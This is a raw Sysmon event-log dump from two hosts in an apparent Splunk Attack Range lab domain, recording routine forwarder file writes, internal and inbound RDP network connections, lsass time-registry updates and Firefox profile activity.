09:17:08.407{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7CDBDB7B00C14A195C9A12BCE92B740,SHA256=E982BCD535F979BC9A460047FAB24425BFFEE377F434718270E65DA92BA8C0E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979899Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:08.554{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BEEE2B3AD0AD0C84B4B6652A310C0B7,SHA256=746B0C2D2E4F256806C695C1C1983F136F98FAC4A9A845DB793638746159F0E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979898Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:05.574{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51689-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979901Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:09.757{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C5D8F5381D1081821F1C22DC3A51DCF,SHA256=699EFAAAEB7B907A396AC63739FF2D84904FB86662322F9BD835CE3F6A31684C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979902Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:10.773{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8383B9CAB5F09D403D630310DD70505,SHA256=B516027E3C3D9585F745996354952CFB79663DBD0B63AF8805D52D62A4E3E8A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051477Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:10.666{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F8DBBED37490C44D12592A3127BBF00,SHA256=BFCEFF542BCA39C09B4F9CE5E4CBFCA3C676FCC5C602CF68298D59D265DC1181,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051476Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:10.104{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40DC61CDFBA02C10B64CE812A0C968A3,SHA256=8512F2B897B27F286B573B06D344B4DB2169A7BE42D2AD4E4FCA59A650AB1990,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051481Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:09.782{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53455-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001051480Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:09.634{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60044-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051479Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:08.822{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53162-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051478Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:11.130{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BF4F694C6EBF03A5C01F5D1E7BC0542,SHA256=0A2D033E72ED175A6C1A142EF1A1AFD9E9B21A3924B8D23D1EB5F37F775BB8CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979904Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:07.851{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59447-false10.0.1.12-8000- 23542300x8000000000000000979903Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:11.387{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4313MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979906Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:12.390{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4314MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979905Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:12.014{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96ABD76201CA67C10BDC85453BAB988D,SHA256=D43FBDFAD3309F4F54EDEF2878B6A98923523F9993F8A33CE367D56FAB988084,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051482Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:12.138{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46A342F68E075BFF4806861EF4E32368,SHA256=0788B89286879C6F7F89761338D9E4488BFDFC44A58C6E4CF6EFD27658FE9FD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979908Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:13.781{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979907Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:13.094{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B80B6FE570FD251AC2C8FA6C97D9BC97,SHA256=8CC65B7613BFB4DE5E9B93401F9026EC6501DEE38734BC347ED0E6EC2C502E22,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001051499Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:17:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001051498Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:17:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fd325b0) 13241300x80000000000000001051497Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:17:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b378-0x134ec0d5) 13241300x80000000000000001051496Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:17:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b380-0x751328d5) 13241300x80000000000000001051495Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:17:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b388-0xd6d790d5) 13241300x80000000000000001051494Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:17:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001051493Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:17:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fd325b0) 13241300x80000000000000001051492Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:17:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b378-0x134ec0d5) 13241300x80000000000000001051491Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:17:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b380-0x751328d5) 13241300x80000000000000001051490Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:17:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b388-0xd6d790d5) 23542300x80000000000000001051489Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:13.203{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=A89EF4C8850889BBBB29A9C07A649223,SHA256=D547E66D8FC37D94F9318F0A09AE136449627479DCA9D4803CCEA59AA0D9289E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051488Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:13.202{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=6159D9D31E07F1FD2CFB07FC56A005F2,SHA256=9DA3EA32936A0680500E95B2DEA1FACDBC55A560CDF37FB78C7669563DFE8141,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051487Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:13.200{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=5A45C5C7958E9FF42483D9DBA392C639,SHA256=CFE20A39B5C23B18450E5F753640A44C56C68A5379F484BC63AD94DCEEDC101D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051486Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:13.198{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=C8FBDF864C79908DADD6BFCD1A018820,SHA256=54218867F8DE287DC60FB08563FA96C3AFAEFC853618119628728825693554B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051485Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:13.197{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=1270D71F82F2D1220C8D841F804841A2,SHA256=A94F9B8C8E3D71C1280F6D102C21DBD665D2889D0BD8319FCB084DAACD0DFEEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051484Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:13.195{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=944EA2786EB305EEF157650544B23D0F,SHA256=511F11FDD403521481FCE81CD52296DD170703EFB0F9C207421BE0177B769EE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051483Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:13.141{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D545475EE8695B29112F005C25AC815,SHA256=6B9FEF2A9A16BDE674E3FE61E665969CDF9765F02964F0091B82319D29950621,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979909Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:14.109{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDB85590F844B4FDEB89D785DDF7831F,SHA256=E5EF3B90C8FA38ABB4EC0CC70A4380BAB1C7AD5B1C847EF66F16BC1E65EF578D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051500Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:14.237{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7461552F67910D7DBB5C8F0E5FAA405,SHA256=671C76321822E9070EA4A6F8B616A124F7C38ACF5CAC1A03F17572E2DCE2ED66,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979911Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:12.421{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59448-false10.0.1.12-8089- 23542300x8000000000000000979910Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:15.156{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EBFA2931AAFBBEF48452A120DFD759F,SHA256=F00845DF1525D514026677A783035B5F29BC841F568AE6F9A8D97E91FCD6C652,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051502Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:14.159{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56381-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051501Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:15.268{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AFCA832407201D9EEB0B22E698DD944,SHA256=FFC0EB9B48072B1F44A61111EEE540060DB8D229E198823B9EDBF3CCD98CB587,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051506Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:14.868{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53456-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051505Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:16.822{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAC46DCC96919D9ADDD2285457803122,SHA256=E732ADEC3F3686F01265D1A7720E6A7FE68F1052DE7756E8095AD4F064DBAC44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051504Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:16.820{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15E983EF39A7BC1BC1E5E3D003254077,SHA256=40DE4EF2D9401A34807332AEE3A041F71F33058C8F629AC2FCBE43A62E189FA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051503Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:16.323{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=451D4B22B44F8A21518ED19FFB4145EE,SHA256=331B17F1C1780FF89C643009EF89013858298174B70A0045C4E2702A9A645940,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979913Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:13.796{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59449-false10.0.1.12-8000- 23542300x8000000000000000979912Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:16.297{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BDAB4FDC2116F3E1A4CEE4B8B2DBF8D,SHA256=4C247D124E052BFDB516B8811D9F44F1463AD22C14DBFF490450E11E38A4B3CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979917Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:14.330{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57113-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979916Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:17.312{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC2ECFDCCFA7F79CA99579063B2D4B8F,SHA256=31019FF6F4A93B6F4D2805C5686415748C71ABAB4400C90038B5602F3422051F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979915Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:17.312{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE1646D143B19586D012B69CC2335C61,SHA256=1A09C2950AA57F4E0941096AB05F22FB933AC42DC64A343276A9021385721042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979914Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:17.312{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=294063D5BE069376D8DA7CC0F8AE87AE,SHA256=FF5495A702C084A48E24FE7F51A8D49889BBA8607EDBDF2B2CF1DCE1E9C489F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051510Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:17.994{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+a0d439|C:\Program Files\Mozilla Firefox\xul.dll+a0d35a|C:\Program Files\Mozilla Firefox\xul.dll+a0cf49|C:\Program Files\Mozilla Firefox\xul.dll+a090df|C:\Program Files\Mozilla Firefox\xul.dll+a093ec|C:\Program Files\Mozilla Firefox\xul.dll+b55c5a|C:\Program Files\Mozilla Firefox\xul.dll+2d9649|C:\Program Files\Mozilla Firefox\xul.dll+2d9554|C:\Program Files\Mozilla Firefox\xul.dll+2d933d|C:\Program Files\Mozilla Firefox\xul.dll+2d91d4|C:\Program Files\Mozilla Firefox\xul.dll+ba1993|C:\Program Files\Mozilla Firefox\xul.dll+ba2691|C:\Program Files\Mozilla Firefox\xul.dll+ba168d|C:\Program Files\Mozilla Firefox\xul.dll+ba15e2|C:\Program Files\Mozilla Firefox\xul.dll+b723b2|C:\Program Files\Mozilla Firefox\xul.dll+1a1b580|C:\Program Files\Mozilla Firefox\xul.dll+b78344|C:\Program Files\Mozilla Firefox\xul.dll+fca4c4|C:\Program Files\Mozilla Firefox\xul.dll+f36457|C:\Program Files\Mozilla Firefox\xul.dll+2cbfda 354300x80000000000000001051509Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:16.103{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53457-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001051508Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:16.103{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53457-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001051507Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:17.326{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E00A1E14617D91D91E5DCCB2648155D9,SHA256=07E3185F3CC45F66B27DCD4A495E4B22AAE66811E58401790FEBA9494660E7B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979920Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:18.890{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE1646D143B19586D012B69CC2335C61,SHA256=1A09C2950AA57F4E0941096AB05F22FB933AC42DC64A343276A9021385721042,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979919Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:16.158{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-65524-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979918Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:18.390{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 